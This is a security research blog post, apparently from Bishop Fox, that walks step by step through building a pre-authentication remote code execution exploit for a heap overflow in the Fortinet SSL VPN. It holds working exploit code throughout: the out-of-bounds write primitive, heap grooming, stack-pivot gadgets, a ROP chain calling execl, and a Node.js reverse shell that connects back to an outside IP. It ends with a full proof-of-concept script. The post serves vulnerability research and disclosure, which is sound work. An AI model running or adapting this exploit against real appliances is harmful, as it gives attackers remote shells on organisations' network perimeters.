Background
Earlier this year, Lexfo published details of a pre-authentication remote code injection vulnerability in the Fortinet SSL VPN. Shortly thereafter, we published a vulnerability scanner and an analysis of vulnerable systems on the internet along with a proof-of-concept demo. This blog post will describe how we built that proof-of-concept exploit, step by step.
Our exploit follows the steps described in Lexfo’s original writeup of the vulnerability. This writeup was extremely helpful when building our exploit, and it includes a lot more detail on the vulnerability.
Test Environment
Our debugging environment consisted of a FortiGate 7.2.4 virtual machine which we modified to disable some self-verification functionality. After bypassing these integrity checks, we were able to install an SSH server, BusyBox, and debugging tools such as GDB.
The Vulnerability
The bug is a heap-based buffer overflow, due to an incorrect size check when decoding a URL parameter in the /remote/hostcheck_validate
and /remote/logincheck
endpoints. These endpoints take a hex-encoded string in the enc
GET parameter with the following format:
FIGURE 1 - enc
parameter format (source)
The seed field is combined with a “salt” and the static string “GCC is the GNU Compiler Collection” to form a key. The salt is derived from the time at which sslpnd was started and can be obtained with a GET request to /remote/info
. Encryption is performed with a custom stream cipher built from MD5. The following Python3 code generates size
bytes of keystream, which is then XOR
'd with the plaintext data to generate the ciphertext:
from hashlib import md5 def gen_ks(salt, seed, size): magic=b'GCC is the GNU Compiler Collection.' k0=md5(salt+seed+magic).digest() keystream=k0 while len(keystream)<size: k0=md5(k0).digest() keystream+=k0 return keystream[:size]
The application will call fsv_malloc
to allocate a buffer of size strlen(enc_parameter) / 2 + 1
, and hex-decode the data into this buffer. It will then decrypt the length field and attempt to perform a bounds check. Unfortunately, this check is implemented incorrectly, and the length field is compared to the previously computed length of the hex-encoded enc
parameter rather than the length of the allocated buffer. As a result, we can “decrypt” memory out-of-bounds of the buffer.
Heap Allocator
FortiOS uses jemalloc
as its main allocator. Compared to GNU libc malloc
implementation, jemalloc
is much more predictable and does not implement countermeasures against heap exploitation. As noted by Lexfo:
- Allocations are contiguous, without any heap metadata between chunks
- Freelists for chunks of a given size range are implemented with a LIFO mechanism, so we can reliably reclaim chunks
Like many other allocators, jemalloc
uses different freelists for different chunk sizes. It can be helpful to keep these chunk sizes in mind when crafting allocations. The documentation
includes a table of these size classes for 64-bit systems.
FIGURE 2 - Table of size classes and spacings for small chunks
Our First Crash
With the initial theory in mind, let’s see if we can cause a crash.
We first define some helper functions to generate the encrypted data given a salt, seed, size field, and data.
def gen_ks(salt, seed, size): magic=b'GCC is the GNU Compiler Collection.' k0=md5(salt+seed+magic).digest() ks=k0 while len(ks)<size: k0=md5(k0).digest() ks+=k0 return ks[:size] def gen_enc_data(salt, seed, size, data): plaintext=struct.pack("<H", size) + data keystream = gen_ks(salt, seed, len(plaintext)) ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex() return seed.decode()+ciphertext
Next, we grab the salt from the remote server:
r=requests.get(BASEURL+"/remote/info", verify=False) salt=r.content.split(b"salt='")[1].split(b"'")[0] print("salt: "+salt.decode())
Using this salt, we generate the enc
parameter. To trigger a 0x1000-byte allocation, we send 0x1000-4-2-1 bytes of data, accounting for the size of the seed and length fields as well as the extra byte that gets added by sslvpnd for the null terminator. Then, we set the length field to just under 0x2000 to trigger the bug.
payload='enc='+gen_enc_data(salt, b'00bfbfbf', 0x1f00, b'A'*(0x1000-4-2-1)) try: r=requests.post(BASEURL+'/remote/hostcheck_validate', headers={'content-type':'application/x-www-form-urlencoded'}, verify=False, data=payload) except requests.exceptions.ConnectionError: print('Crashed!')
We run this and... nothing happens. We get an error reply from the server, but no crash. What gives?
As it turns out, the answer is simple: the fsv_malloc
function which allocates the response buffer adds 0x18 bytes of header information before calling jemalloc
to allocate the actual data buffer. Changing the size of the data field to 0x1000-0x18-7 and re-running reliably results in a crash:
$ python3 crash.py Salt: 749a2b77 Crashed!
Out of Bounds Write Primitive
The next step is to turn our crash into an out-of-bounds write primitive. The technique described by Lexfo is very powerful, and we were able to reproduce it without any issues.
We start by brute forcing a seed value which results in a keystream containing the target byte at the correct offset.
def gen_seed_for_offset(salt, offset, value): for i in range(0xffffff): seed="00{0:06x}".format(i).encode() ks=gen_ks(salt, seed, offset+1) if int(ks[offset])==int(value): return seed print("keystream search failed") return None
Next, we send two requests with the same seed. The first request will have a length field that causes sslvpnd to write the null terminator to the target byte. The second request will have a length field which is one byte larger, resulting in the target byte being “decrypted”. Since encryption uses XOR
, and we have just set the target byte to 0, this results in writing a chosen value to the target offset. This will clobber the byte after the target value, but as you will see later, this isn’t an issue in practice. As an optimization, we can write a null byte by sending the same request twice, which means we can skip the brute force step.
def gen_seeds_u8(salt, offset, val): value=struct.pack("<B", val) if val==0: return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)] s = gen_seed_for_offset(salt, offset, value[0]) return [(s,offset-2),(s,offset-1)]
We know that we will want to write pointer values later, so we also make a helper function to generate seeds for pointers. For these values, we will start with the last byte of the 64-bit value and work backwards to avoid clobbering later data with the null byte that gets written by sslvpnd. Next, we can use the same optimization of skipping the brute force when writing null bytes. Additionally, on x86-64, user mode addresses start with two null bytes. This means we are never at risk of clobbering important data when we write a pointer to memory.
def gen_seeds_u64(salt, offset, val): value=struct.pack("<Q", val) seeds=[] n=7 for i in range(n,-1,-1): if value[i]!=0: s=gen_seed_for_offset(salt, offset+i, value[i]) seeds.append((s, offset+i-1)) seeds.append((s, offset+i-2)) else: # save some time by skipping the brute force. the application will write a null terminator to buf[size] seeds.append((b'00bfbfbf', offset+i-1)) seeds.append((b'00bfbfbf', offset+i-1)) return seeds[::-1]
Heap Grooming
Our goal is to overwrite a callback in an SSL struct. This means we will have to be able to reliably and repeatedly allocate our payload immediately before an SSL struct. Again, we follow Lexfo’s methodology of using a socket, which triggers allocations of a request buffer and an SSL structure in the same heap region, and then attempting to de-allocate the request buffer and allocate a new request buffer in its place. On our 64-bit system running version 7.2.4, the SSL struct has a size of 0x1db8 and is therefore allocated in the 0x2000 byte region. On older systems, we observed the SSL structure was 0x1850, and therefore allocated in the 0x1c00 region. Most of this writeup will assume a size of 0x2000.
To track down sources of allocations and deallocations, we made a GDB script that would print out useful debugging information while we made requests:
set height 0 set pagination off set disassembly-flavor intel handle SIGPIPE nostop # break after allocating the buffer grab the address b *0x0173164e commands silent set $heap_obj = $rax printf "buffer: %p\n", $heap_obj c end # print address of SSL objects when malloc'd b *CRYPTO_zalloc+37 if ( $r12 == 0x1db8 ) commands silent printf "CRYPTO_zalloc(0x%x) = %p\n", $r12, $rax c end # break in malloc helper function (used by vulnerable function) b *0x018021d6 if (($r13>0x1c00) && ($r13<=0x2000)) commands silent set $size = $r13 set $addr = $rax printf "malloc(0x%x) = %p\n", $size, $addr c end # break in je_malloc in case something calls je_malloc directly b *je_malloc if (($rdi>0x1c00) && ($rdi <=0x2000)) commands silent printf "je_malloc(%x)\n", $rdi c end
The exact addresses and registers that we use in this script were identified through static analysis and will need to be changed for each version you test. Using this script, we were able to minimize noise due to extraneous allocations, and reliably obtain the heap layout we want. This boils down to a few steps:
- Create a
requests.Session
and issue a request to establish the TLS connection - Create a bunch of sockets to fill in holes on the heap
- Send a very long message on one of the sockets, causing its data buffer to be freed and re-allocated elsewhere
- Send multiple requests (using the Session established in step one) which each cause a 0x2000 byte allocation, and use them to overwrite the SSL struct
Step one is easy. We create a session with sess=requests.Session()
, and replace our requests.get()/post()
with sess.get()/post()
. This will avoid repeatedly deallocating and reallocating the SSL object associated with our connection, resulting in much less noise on the heap.
Step two and three are also easy:
import ssl # Disable SSL verification context = ssl.SSLContext() context.verify_mode=ssl.CERT_NONE ssocks=[] # Create one SSL socket and save it in the global ssocks list def create_ssl_conn(): s=socket.create_connection(HOST, timeout=None) ss=context.wrap_socket(s) ssocks.append(ss) for i in range(20): create_ssl_conn() # Pick one SSL socket and force its data buffer to be reallocated ssocks[-2].send(b’A’*0x2001)
Step four is something we have already done: send requests to “decrypt” out-of-bounds data. We will use our helper functions from earlier to create a list of seeds and length fields. We will then iterate through this list and send a request with the size and seed set correctly, and the data field will be 0x2000-0x18-7 bytes long, so we trigger a 0x2000 byte allocation.
One last note about the data field is that the plaintext must have a null byte before the first & or =. Otherwise, more allocations may occur. We work around this by simply starting our data with a few nulls.
RIP Control
Now that we have tamed the heap, we can work on the last few steps of achieving RCE. Right now, the hex-decoded data buffer is located 0x2000-0x18 bytes before the SSL structure. The first 4 bytes of this are the plaintext salt, followed by the encrypted size field and data payload. This means that when calculating offsets for our seed generation, the first byte of the SSL structure is at offset 0x2000-0x18-4. We know from Lexfo’s writeup that we will want to overwrite the handshake_func
callback, which is at offset 0x30 within this structure. We also know from Orange Tsai’s writeup of CVE-2018-13383 that OpenSSL calls SSL_in_init
before calling handshake_func
. SSL_in_init
checks the in_init
field in our SSL structure, which will be false for established connections. Let’s overwrite these fields and see what happens.
In our exploit script, we add:
seeds=[] seeds.extend(gen_seeds_u64(salt, handshake_func, 0x4141414141414141)) seeds.extend(gen_seeds_u8(salt, in_init, 1)) for i in seeds: print((i[0], hex(i[1]-ssl_offset))) make_req(sess, salt, i[0], i[1], b'\0'*8 + b'A'*(0x2000-0x18-7-8))
And when we observe the results in GDB, we see:
(gdb) c Continuing. CRYPTO_zalloc(0x1db8) = 0x7f6e3ead9000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb1e000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2a000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2e000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb3f000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb43000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb47000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb51000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb55000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb59000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb5d000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb61000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb16000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb6e000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb72000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb76000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb7a000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb84000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb88000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb8c000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb90000 CRYPTO_zalloc(0x1db8) = 0x7f6e3eb94000 CRYPTO_zalloc(0x1db8) = 0x7f6e3ebbc000 CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc0000 CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc4000 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 malloc(0x2000) = 0x7f6e3ebbe000 buffer: 0x7f6e3ebbe018 Program received signal SIGSEGV, Segmentation fault. 0x00007f6e43f2fe1b in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.3 (gdb) x/i $rip => 0x7f6e43f2fe1b: call QWORD PTR [rbp+0x30] (gdb) x/gx $rbp+0x30 0x7f6e3ebc0030: 0x4141414141414141 (gdb)
As expected, the program crashes when trying to jump to 0x4141414141414141! Only a few more steps now.
Stack Pivot
The heap, where our data is located, is not mapped as executable. This means we won’t be able to send some shellcode and jump to it. We can easily make a ROP chain since the process doesn’t use ASLR, but since we don’t control data on the stack, the first gadget on the ROP chain will return to an address that we can’t control. This means we will have to find a way to point the stack pointer at something we can control. Looking at registers, we saw that both RDI and RBP point to the SSL structure that we can overwrite.
Using ropr, we find a push rdi; pop rsp;
ret
gadget at address 0xfd0582. Using this, we can place a second gadget at the start of the SSL structure and let it run. Unfortunately, the field after this is method, which is a pointer to a function table that we can’t safely overwrite without causing a crash. This means we must use another stack pivot gadget to adjust the stack pointer again. Since the stack pointer is already pointing close to our data, we attempt to find a gadget which would subtract a small value from RSP, causing it to point into our data buffer. Unfortunately, we can’t find a good gadget and settle for an add
rsp
, 0x270; pop rbx; pop r12; pop rbp; ret;
gadget instead. That means, after the second stage of our ROP gadget, we are pointing the stack at SSL+0x290. Luckily, we finally have enough room to fit a longer ROP payload here.
In the last stage of our pivot gadget, RDI is still pointing at our SSL structure. We found a sub rdi
, 0x100
gadget at 0x1afd214, and then follow this with the original push
rdi; pop rsp;
gadget to finally point our stack into the data buffer which we control. We could have alternatively used the write primitive to insert our entire ROP chain into the SSL structure, but that would require brute forcing more seeds and sending more requests, which would slow down the exploit significantly.
The three-stage pivot setup looks like this:
# set rsp = *SSL PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret # rsp=*SSL+0x290 PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret; # rsp = *SSL-0x100 PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret; seeds=[] seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30, PIVOT_1)) seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00, PIVOT_2)) seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3)) seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1)) seeds.extend(gen_seeds_u8(salt, in_init, 1))
And running that results in:
(gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0000000000fd0584 in ?? () (gdb) i r rdi rsp rdi 0x7f6e3ebbff00 0x7f6e3ebbff00 rsp 0x7f6e3ebbff00 0x7f6e3ebbff00 (gdb) x/8gx $rsp 0x7f6e3ebbff00: 0x4141414141414141 0x4141414141414141 0x7f6e3ebbff10: 0x4141414141414141 0x4141414141414141 0x7f6e3ebbff20: 0x4141414141414141 0x4141414141414141 0x7f6e3ebbff30: 0x4141414141414141 0x4141414141414141 (gdb) x/8gx $rsi+0x100 0x7f6e3ebc0000: 0x00000000008ecb49 0x00007f6e43f7f700 0x7f6e3ebc0010: 0x00007f6e3eacc660 0x00007f6e3eacc660 0x7f6e3ebc0020: 0x0000000000000000 0x0000000000000001 0x7f6e3ebc0030: 0x0000000000fd0582 0x0000000000000000 (gdb)
As expected, our stack points to 0x100 bytes from the end of our data buffer, or 0x100 bytes before the start of the SSL structure. This gives us plenty of room to fit a ROP chain in our buffer.
ROP Chain
Although it would be nice to simply call system('<commands>')
, FortiOS uses a custom binary for /bin/sh
which restricts what commands you can run. As a result, trying to run anything useful using system()
or popen()
will fail. Instead of using one of these convenient wrappers, we will construct a slightly less convenient ROP chain which calls execl
. As a proof-of-concept, we will run execl('/bin/node', '/bin/node', '-e', '<node payload>', NULL)
.
The actual Node payload will be a slightly modified version of the NodeJS reverse shell we found in the PayloadAllTheThings GitHub repository. Specifically, instead of running /bin/sh
, we run /bin/node
and pass in the -i
argument for an interactive prompt. We also modify the connect-back IP to suit our test environment.
shell=b"""(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/node", ["-i"]); var client = new net.Socket(); client.connect(4242, "192.168.250.110", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })(); """
Since we have plenty of space for our ROP chain, we don’t try to optimize it too much. The simplified, pseudo-assembly version of our ROP chain is below.
mov rax, rdi ; rax = SSL-0x100 mov rcx, ~(0x1000-1) and rax, rcx mov rcx, rax ; rcx = SSL-0x1000 mov [scratch_buffer+0], "/bin/nod" mov [scratch_buffer+8], "e\0-e\0\0\0\0" mov rdi, &scratch_buffer ; "/bin/node mov rsi, &scratch_buffer ; "/bin/node" mov rdx, &scratch_buffer+10 ; "-e\0" mov r8, 0 ; NULL jmp execl ; execl("/bin/node", "/bin/node", "-e", payload, NULL);
Because of how jemalloc
allocates memory, we know that our allocated buffer will be aligned to 0x2000 bytes. We also know that the rdi
is a pointer to our ROP chain, since that’s the register we used to jump to our ROP chain in the first place. By masking out the bottom few bits, we point <font face="SFMono-Regular, Consolas, Liberation Mono, Menlo, Courier, monospace">rcx</font>
into the middle of our buffer, which gives us plenty of room to add NodeJS code to do whatever we want. As for the other arguments, we decide to pick a fixed address that is readable and writable to use as a scratch buffer. We can then use a simple group of gadgets to write /bin/node\0-e\0\0\0\0
to that buffer. From there, we pop hardcoded values into rdi
, rsi
, rdx
, and r8
. Once that’s done, we jump to execl
and our payload runs.
def pad(d, n, c=b'\0'): return d+c*(n-len(d)) def u64(x): return struct.pack("<Q", x) def make_ropchain(): scratch=b'/bin/node\0-e\0\0\0\0' scratch_vals=struct.unpack("<2Q", scratch) scratch_addr=0x04825000 argv_1=scratch_addr+scratch.index(b"-e\0") rop =b'' # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload rop+=u64(0x02b228a0) # mov rax, rdi; ret; rop+=u64(0x00b15381) # pop rcx; ret rop+=u64(0xfffffffffffff000) rop+=u64(0x02c85e40) # and rax, rcx; ret; rop+=u64(0x00b15381) # pop rcx; ret rop+=u64(0) # <rcx = 0> rop+=u64(0x02166fa9) # or rcx, rax; ...; ret; # 2. write "/bin/node\0-e\0" to a scratch buffer rop+=u64(0x02c87265) # pop rax; ret; rop+=u64(scratch_vals[0]) # "/bin/nod" rop+=u64(0x02ca1f52) # pop rsi; ret; rop+=u64(scratch_addr) # <scratch buffer> rop+=u64(0x029e36dd) # mov [rsi], rax; ret rop+=u64(0x02c87265) # pop rax; ret; rop+=u64(scratch_vals[1]) # "e\0-e\0\0\0\0" rop+=u64(0x02ca1f52) # pop rsi; ret; rop+=u64(scratch_addr+8) # <scratch buffer> rop+=u64(0x029e36dd) # mov [rsi], rax; ret # setup arguments for execl rop+=u64(0x02ca0763) # pop rdi; ret; rop+=u64(scratch_addr) # "/bin/node" rop+=u64(0x02ca1f52) # pop rsi; ret; rop+=u64(scratch_addr) # "/bin/node" rop+=u64(0x02b76f39) # pop rdx rop+=u64(argv_1) # "-e" rop+=u64(0x0289a815) # REX.WRXB pop r8 rop+=u64(0) # rcx already points to the last argument # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL); rop+=u64(0x0043b170) # execl@PLT # pad to size assert len(rop) < 0x100 return rop
We construct the data buffer to place our JS payload at 0x1000 within the chunk, and the ROP chain at 0x1f00 within the chunk.
payload_size=0x2000-0x18-7 payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6)) payload+=pad(shell, 0x1000-0x100) payload+=make_ropchain() payload =pad(payload, payload_size)
And modify our code to send this payload instead of the A’s we were sending before:
for i in seeds: make_req(sess, salt, i[0], i[1], payload)
Finally, it’s time to start a netcat listener and catch a shell:
FIGURE 3 - Running the exploit and seeing our Node reverse shell
Full Proof of Concept
import requests, struct, ssl, socket, socket from hashlib import md5 from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) context = ssl.SSLContext() context.verify_mode=ssl.CERT_NONE context.options|=ssl.OP_NO_TLSv1_3 HOST=("192.168.250.124",12443) BASEURL="https://{}:{}".format(*HOST) ssocks=[] def create_ssl_conn(): s=socket.create_connection(HOST, timeout=None) ss=context.wrap_socket(s) ssocks.append(ss) def gen_ks(salt, seed, size): magic=b'GCC is the GNU Compiler Collection.' k0=md5(salt+seed+magic).digest() ks=k0 while len(ks)<size: k0=md5(k0).digest() ks+=k0 return ks[:size] def gen_enc_data(salt, seed, size, data): plaintext=struct.pack("<H", size) + data keystream = gen_ks(salt, seed, len(plaintext)) ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex() return seed.decode()+ciphertext def make_req(sess, salt, seed, reqsize, data=b''): payload=gen_enc_data(salt, seed, reqsize, data) payload="enc="+payload</p> r=sess.post(BASEURL+"/remote/hostcheck_validate", headers={"content-type":"application/x-www-form-urlencoded"}, verify=False, data=payload) return r def gen_seed_for_offset(salt, offset, value, incl_ks=False): for i in range(0xffffff): seed="00{0:06x}".format(i).encode() ks=gen_ks(salt, seed, offset+1) if int(ks[offset])==int(value): if incl_ks: return seed, ks[:offset+1] else: return seed else: print("keystream search failed") return def gen_seeds_u8(salt, offset, val): value=struct.pack("<B", val) if val==0: return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)] s = gen_seed_for_offset(salt, offset, value[0]) return [(s,offset-2),(s,offset-1)] def gen_seeds_u64(salt, offset, val): value=struct.pack("<Q", val) seeds=[] n=7 for i in range(n,-1,-1): if value[i]!=0: s=gen_seed_for_offset(salt, offset+i, value[i]) seeds.append((s, offset+i-1)) seeds.append((s, offset+i-2)) else: seeds.append((b'00bfbfbf', offset+i-1)) seeds.append((b'00bfbfbf', offset+i-1)) return seeds[::-1] def pad(d, n, c=b'\0'): return d+c*(n-len(d)) def u64(x): return struct.pack("<Q", x) def make_ropchain(): scratch=b'/bin/node\0-e\0\0\0\0' scratch_vals=struct.unpack("<2Q", scratch) scratch_addr=0x04825000 argv_1=scratch_addr+scratch.index(b"-e\0") rop =b'' # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload rop+=u64(0x02b228a0) # mov rax, rdi; ret; rop+=u64(0x00b15381) # pop rcx; ret rop+=u64(0xfffffffffffff000) rop+=u64(0x02c85e40) # and rax, rcx; ret; rop+=u64(0x00b15381) # pop rcx; ret rop+=u64(0) # <rcx = 0> rop+=u64(0x02166fa9) # or rcx, rax; ...; ret; # 2. write "/bin/node\0-e\0" to a scratch buffer rop+=u64(0x02c87265) # pop rax; ret; rop+=u64(scratch_vals[0]) # "/bin/nod" rop+=u64(0x02ca1f52) # pop rsi; ret; rop+=u64(scratch_addr) # <scratch buffer> rop+=u64(0x029e36dd) # mov [rsi], rax; ret rop+=u64(0x02c87265) # pop rax; ret; rop+=u64(scratch_vals[1]) # "e\0-e\0\0\0\0" rop+=u64(0x02ca1f52) # pop rsi; ret; rop+=u64(scratch_addr+8) # <scratch buffer> rop+=u64(0x029e36dd) # mov [rsi], rax; ret # setup arguments for execl rop+=u64(0x02ca0763) # pop rdi; ret; rop+=u64(scratch_addr) # "/bin/node" rop+=u64(0x02ca1f52) # pop rsi; ret; rop+=u64(scratch_addr) # "/bin/node" rop+=u64(0x02b76f39) # pop rdx rop+=u64(argv_1) # "-e" rop+=u64(0x0289a815) # REX.WRXB pop r8 rop+=u64(0) # rcx already points to the last argument # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL); rop+=u64(0x0043b170) # execl@PLT # pad to size assert len(rop) < 0x100-1 return rop shell=b"""(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/node", ["-i"]); var client = new net.Socket(); client.connect(4242, "192.168.250.110", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })(); """ payload_size=0x2000-0x18-7 payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6)) payload+=pad(shell, 0x1000-0x100) payload+=make_ropchain() payload =pad(payload, payload_size) sess=requests.Session() r=sess.get(BASEURL+"/remote/info", verify=False) salt=r.content.split(b"salt='")[1].split(b"'")[0] print("salt: "+salt.decode()) ssl_offset=0x2000-0x18-4 handshake_func=ssl_offset + 0x30 in_init = ssl_offset+0x64 # set rsp = *SSL PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret # rsp=*SSL+0x290 PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret; # rsp = *SSL-0x100 PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret; seeds=[] seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30, PIVOT_1)) seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00, PIVOT_2)) seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3)) seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1)) seeds.extend(gen_seeds_u8(salt, in_init, 1)) for i in range(24): create_ssl_conn() ssocks[-2].send(b'A'*0x2001) for i in seeds: make_req(sess, salt, i[0], i[1], payload)
Conclusion
This vulnerability is yet another which would not have been nearly as impactful if basic exploit mitigations (ASLR in this case) were implemented. This is a pattern we have observed across most major network appliances, and we hope that the prevalence of memory corruption vulnerabilities results in a push to implement these mitigations. We had a lot of fun developing this exploit, and we would once again like to thank Lexfo for their helpful blog post which laid out a very clear roadmap of how to exploit this vulnerability. We look forward to continuing to share our research on network appliance vulnerabilities in the future.
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.